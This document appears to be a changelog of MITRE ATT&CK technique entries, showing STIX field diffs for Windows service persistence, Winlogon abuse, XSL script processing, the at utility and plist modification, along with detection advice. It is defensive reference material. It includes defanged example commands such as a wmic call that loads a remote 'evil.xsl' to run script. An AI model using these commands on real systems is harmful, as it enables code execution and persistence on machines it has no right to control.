Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence.(Citation: TechNet Autoruns)(Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding events. Event ID 5861 is logged on Windows 10 systems when new EventFilterToConsumerBinding events are created.(Citation: Elastic - Hunting for Persistence Part 1)
Monitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).(Citation: Microsoft Register-WmiEvent) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| Old Description | New Description |
|---|---|
| Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). Adversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system. An adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used. Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). | Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component). |
New Mitigations:
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding to help with intrusion detection. Retrieved August 7, 2018. | |
| external_references | Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020. | |
| external_references | Microsoft. (n.d.). Services. Retrieved June 7, 2016. |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-478 | |
| external_references | CAPEC-550 | |
| external_references | CAPEC-551 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-09-16 15:49:58.490000+00:00 | 2022-06-30 20:17:33.824000+00:00 |
| description | Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). Adversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system. An adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used. Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). | Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component). |
| external_references[1]['source_name'] | capec | Microsoft Windows Event Forwarding FEB 2018 |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/478.html | https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection |
| external_references[2]['source_name'] | capec | ESET InvisiMole June 2020 |
| external_references[2]['url'] | https://capec.mitre.org/data/definitions/550.html | https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf |
| external_references[3]['source_name'] | capec | TechNet Services |
| external_references[3]['url'] | https://capec.mitre.org/data/definitions/551.html | https://technet.microsoft.com/en-us/library/cc772408.aspx |
| external_references[4]['source_name'] | TechNet Services | Microsoft 4697 APR 2017 |
| external_references[4]['description'] | Microsoft. (n.d.). Services. Retrieved June 7, 2016. | Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service was installed in the system. Retrieved August 7, 2018. |
| external_references[4]['url'] | https://technet.microsoft.com/en-us/library/cc772408.aspx | https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697 |
| external_references[5]['source_name'] | TechNet Autoruns | Symantec W.32 Stuxnet Dossier |
| external_references[5]['description'] | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. | Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020. |
| external_references[5]['url'] | https://technet.microsoft.com/en-us/sysinternals/bb963902 | https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf |
| external_references[6]['source_name'] | Microsoft 4697 APR 2017 | Unit42 AcidBox June 2020 |
| external_references[6]['description'] | Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service was installed in the system. Retrieved August 7, 2018. | Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021. |
| external_references[6]['url'] | https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697 | https://unit42.paloaltonetworks.com/acidbox-rare-malware/ |
| external_references[7]['source_name'] | Microsoft Windows Event Forwarding FEB 2018 | TechNet Autoruns |
| external_references[7]['description'] | Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding to help with intrusion detection. Retrieved August 7, 2018. | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. |
| external_references[7]['url'] | https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection | https://technet.microsoft.com/en-us/sysinternals/bb963902 |
| x_mitre_contributors[1] | Travis Smith, Tripwire | Pedro Harrison |
| x_mitre_contributors[2] | Pedro Harrison | Mayuresh Dani, Qualys |
| x_mitre_data_sources[0] | Service: Service Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[3] | Process: Process Creation | Windows Registry: Windows Registry Key Creation |
| x_mitre_data_sources[6] | Windows Registry: Windows Registry Key Creation | Process: Process Creation |
| x_mitre_data_sources[7] | Windows Registry: Windows Registry Key Modification | Service: Service Creation |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Crowdstrike DriveSlayer February 2022', 'description': 'Thomas, W. et al. (2022, February 25). CrowdStrike Falcon Protects from New Wiper Malware Used in Ukraine Cyberattacks. Retrieved March 25, 2022.', 'url': 'https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/478.html', 'external_id': 'CAPEC-478'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/550.html', 'external_id': 'CAPEC-550'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/551.html', 'external_id': 'CAPEC-551'} | |
| x_mitre_contributors | Wietze Beukema, @wietze | |
| x_mitre_contributors | Akshat Pradhan, Qualys | |
| x_mitre_data_sources | Driver: Driver Load |
| Old Description | New Description |
|---|---|
Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013) * Winlogon\Notify - points to notification package DLLs that handle Winlogon events * Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on * Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence. |
Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon.(Citation: Cylance Reg Persistence Sept 2013)
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
* Winlogon\Notify - points to notification package DLLs that handle Winlogon events
* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018. | |
| external_references | CAPEC-579 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-579 | |
| external_references | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-04-21 16:00:41.277000+00:00 | 2022-04-20 16:32:14.691000+00:00 |
| description | Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013)
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
* Winlogon\Notify - points to notification package DLLs that handle Winlogon events
* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence. |
Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon.(Citation: Cylance Reg Persistence Sept 2013)
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
* Winlogon\Notify - points to notification package DLLs that handle Winlogon events
* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence. |
| external_references[1]['source_name'] | capec | Cylance Reg Persistence Sept 2013 |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/579.html | https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order |
| external_references[2]['source_name'] | Cylance Reg Persistence Sept 2013 | TechNet Autoruns |
| external_references[2]['description'] | Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018. | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. |
| external_references[2]['url'] | https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order | https://technet.microsoft.com/en-us/sysinternals/bb963902 |
| external_references[3]['source_name'] | TechNet Autoruns | capec |
| external_references[3]['url'] | https://technet.microsoft.com/en-us/sysinternals/bb963902 | https://capec.mitre.org/data/definitions/579.html |
| x_mitre_data_sources[0] | Windows Registry: Windows Registry Key Modification | Command: Command Execution |
| x_mitre_data_sources[2] | Command: Command Execution | Windows Registry: Windows Registry Key Modification |
| Description |
|---|
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)
* msxsl.exe customers[.]xml script[.]xsl
* msxsl.exe script[.]xsl script[.]xsl
* msxsl.exe script[.]jpeg script[.]jpeg
Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)
* Local File: wmic process list /FORMAT:evil[.]xsl
* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl” |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-02-09 15:07:00.842000+00:00 | 2022-05-05 05:04:14.238000+00:00 |
| external_references[1]['source_name'] | Microsoft XSLT Script Mar 2017 | Reaqta MSXSL Spearphishing MAR 2018 |
| external_references[1]['description'] | Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting Using |
Admin. (2018, March 2). Spear-phishing campaign leveraging on MSXSL. Retrieved July 3, 2018. |
| external_references[1]['url'] | https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script | https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/ |
| external_references[2]['source_name'] | Microsoft msxsl.exe | Twitter SquiblyTwo Detection APR 2018 |
| external_references[2]['description'] | Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe). Retrieved July 3, 2018. | Desimone, J. (2018, April 18). Status Update. Retrieved July 3, 2018. |
| external_references[2]['url'] | https://www.microsoft.com/download/details.aspx?id=21714 | https://twitter.com/dez_/status/986614411711442944 |
| external_references[3]['source_name'] | Penetration Testing Lab MSXSL July 2017 | LOLBAS Wmic |
| external_references[3]['description'] | netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved July 3, 2018. | LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019. |
| external_references[3]['url'] | https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/ | https://lolbas-project.github.io/lolbas/Binaries/Wmic/ |
| external_references[4]['source_name'] | Reaqta MSXSL Spearphishing MAR 2018 | Microsoft msxsl.exe |
| external_references[4]['description'] | Admin. (2018, March 2). Spear-phishing campaign leveraging on MSXSL. Retrieved July 3, 2018. | Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe). Retrieved July 3, 2018. |
| external_references[4]['url'] | https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/ | https://www.microsoft.com/download/details.aspx?id=21714 |
| external_references[5]['source_name'] | XSL Bypass Mar 2019 | Penetration Testing Lab MSXSL July 2017 |
| external_references[5]['description'] | Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to Proxy Code Execution. Retrieved August 2, 2019. | netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved July 3, 2018. |
| external_references[5]['url'] | https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75 | https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/ |
| external_references[6]['source_name'] | LOLBAS Wmic | XSL Bypass Mar 2019 |
| external_references[6]['description'] | LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019. | Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to Proxy Code Execution. Retrieved August 2, 2019. |
| external_references[6]['url'] | https://lolbas-project.github.io/lolbas/Binaries/Wmic/ | https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75 |
| external_references[7]['source_name'] | Twitter SquiblyTwo Detection APR 2018 | Microsoft XSLT Script Mar 2017 |
| external_references[7]['description'] | Desimone, J. (2018, April 18). Status Update. Retrieved July 3, 2018. | Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting Using |
| external_references[7]['url'] | https://twitter.com/dez_/status/986614411711442944 | https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script |
| x_mitre_defense_bypassed[1] | Application control | Digital Certificate Validation |
| x_mitre_defense_bypassed[2] | Digital Certificate Validation | Application Control |
| Description |
|---|
Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial, recurring, or future execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)
An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.
Adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at) |
| Description for T1053.002 At |
|---|
Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow file. If the at.allow file does not exist, the at.deny file is checked. Every username not listed in at.deny is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
Adversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM).
In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | ['Scheduled Job: Scheduled Job Creation', 'Command: Command Execution', 'Process: Process Creation'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 14:36:26.063000+00:00 | 2022-04-16 20:45:01.814000+00:00 |
| revoked | False | True |
| external_references[1]['source_name'] | Kifarunix - Task Scheduling in Linux | rowland linux at 2019 |
| external_references[1]['description'] | Koromicha. (2019, September 7). Scheduling tasks using at command in Linux. Retrieved December 3, 2019. | Craig Rowland. (2019, July 25). Getting an Attacker IP Address from a Malicious Linux At Job. Retrieved October 15, 2021. |
| external_references[1]['url'] | https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/ | https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/ |
| external_references[3]['source_name'] | rowland linux at 2019 | Kifarunix - Task Scheduling in Linux |
| external_references[3]['description'] | Craig Rowland. (2019, July 25). Getting an Attacker IP Address from a Malicious Linux At Job. Retrieved October 15, 2021. | Koromicha. (2019, September 7). Scheduling tasks using at command in Linux. Retrieved December 3, 2019. |
| external_references[3]['url'] | https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/ | https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/ |
| Description |
|---|
Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence. Plist files are used by macOS applications to store properties and configuration settings for applications and services. Applications use information plist files, Info.plist, to tell the operating system how to handle the application at runtime using structured metadata in the form of keys and values. Plist files are formatted in XML and based on Apple's Core Foundation DTD and can be saved in text or binary format.(Citation: fileinfo plist file description)
Adversaries can modify paths to executed binaries, add command line arguments, and insert key/pair values to plist files in auto-run locations which execute upon user logon or system startup. Through modifying plist files in these locations, adversaries can also execute a malicious dynamic library (dylib) by adding a dictionary containing the DYLD_INSERT_LIBRARIES key combined with a path to a malicious dylib under the EnvironmentVariables key in a plist file. Upon user logon, the plist is called for execution and the malicious dylib is executed within the process space. Persistence can also be achieved by modifying the LSEnvironment key in the application's Info.plist file.(Citation: wardle artofmalware volume1) |
| Description for T1647 Plist File Modification |
|---|
Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the info.plist file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.(Citation: fileinfo plist file description)
Adversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://attack.mitre.org/techniques/T1564/003)) or running additional commands for persistence (ex: [Launch Agent](https://attack.mitre.org/techniques/T1543/001)/[Launch Daemon](https://attack.mitre.org/techniques/T1543/004) or [Re-opened Applications](https://attack.mitre.org/techniques/T1547/007)).
For example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist` file, which controls apps that appear in the Dock. Adversaries can also modify the LSUIElement key in an application’s info.plist file to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as LSEnvironment, to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation: wardle chp2 persistence)(Citation: eset_osx_flashback) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | ['Service: Service Creation', 'Command: Command Execution', 'File: File Modification', 'Process: Process Creation'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 14:46:47.383000+00:00 | 2022-04-20 21:06:07.560000+00:00 |
| revoked | False | True |
| Description |
|---|
| [AADInternals](https://attack.mitre.org/software/S0677) is a PowerShell-based framework for administering, enumerating, and exploiting Azure Active Directory. The tool is publicly available on GitHub.(Citation: AADInternals Github)(Citation: AADInternals Documentation) |
| Description |
|---|
| [Action RAT](https://attack.mitre.org/software/S1028) is a remote access tool written in Delphi that has been used by [SideCopy](https://attack.mitre.org/groups/G1008) since at least December 2021 against Indian and Afghani government personnel.(Citation: MalwareBytes SideCopy Dec 2021) |
| Description |
|---|
| [Amadey](https://attack.mitre.org/software/S1025) is a Trojan bot that has been used since at least October 2018.(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020) |
| Description |
|---|
| [AuTo Stealer](https://attack.mitre.org/software/S1029) is malware written in C++ has been used by [SideCopy](https://attack.mitre.org/groups/G1008) since at least December 2021 to target government agencies and personnel in India and Afghanistan.(Citation: MalwareBytes SideCopy Dec 2021) |
| Description |
|---|
